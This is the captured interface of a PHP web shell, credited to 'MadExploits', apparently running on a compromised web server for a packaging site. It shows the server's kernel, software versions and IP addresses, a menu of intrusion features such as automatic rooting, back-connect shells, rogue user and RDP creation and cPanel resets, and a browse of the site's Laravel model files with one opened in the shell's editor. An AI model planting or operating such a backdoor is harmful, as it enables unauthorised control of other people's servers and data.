Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.21
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
cbdpackaginghub.com /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Advertisement.php
325
B
-rw-r--r--
Blog.php
536
B
-rw-r--r--
BlogSlider.php
333
B
-rw-r--r--
Category.php
1.2
KB
-rw-r--r--
ContactEntry.php
405
B
-rw-r--r--
ContactInfo.php
338
B
-rw-r--r--
ContactRequest.php
185
B
-rw-r--r--
Contactus.php
300
B
-rw-r--r--
HeaderInfo.php
257
B
-rw-r--r--
Images.php
482
B
-rw-r--r--
Order.php
728
B
-rw-r--r--
Page.php
215
B
-rw-r--r--
Product.php
1.96
KB
-rw-r--r--
ProductColor.php
222
B
-rw-r--r--
ProductGallery.php
598
B
-rw-r--r--
ProductStock.php
183
B
-rw-r--r--
Setting.php
368
B
-rw-r--r--
Slider.php
346
B
-rw-r--r--
SocialMediaLink.php
226
B
-rw-r--r--
Subscriber.php
287
B
-rw-r--r--
Testimonial.php
383
B
-rw-r--r--
Type.php
472
B
-rw-r--r--
User.php
943
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Product.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Product extends Model { use HasFactory; protected $table='products'; protected $fillable=[ 'product_type', 'product_category' , 'product_title', 'product_name', 'product_slug', 'product_name_cat', 'product_description' , 'meta_noindex', 'is_site_map', 'product_detail', 'product_alt', 'product_back_alt', 'product_back_title', 'product_front_title', 'product_box_style', 'product_dimension', 'product_quantity', 'product_paper_stock', 'product_printing' , 'product_finishing', 'product_included_options', 'product_additional_options', 'product_proof', 'product_turnaround', 'product_shipping', 'related_products', 'is_featured', 'is_featured_category', 'is_best_values', 'is_new_arrivals', 'is_top_choices', 'meta_title', 'meta_keywords', 'meta_descriptions', 'seo_html', 'product_image', 'product_back_image', 'display_order', 'status' ]; const CREATED_AT = 'created'; const UPDATED_AT = 'modified'; public function product_categories(){ return $this->belongsToMany(Category::class,'product_assigned_categories','product_id','category_id'); } public function type(){ return $this->belongsTo(Type::class,'product_type'); } public function product_gallery(){ return $this->hasMany(ProductGallery::class); } public function related_products(){ } public function category(){ return $this->belongsTo(Category::class,'product_name_cat','slug'); } public function images(){ return $this->hasMany(Images::class,'product_id' ,'id',)->where('status', '=', 1); } }
Close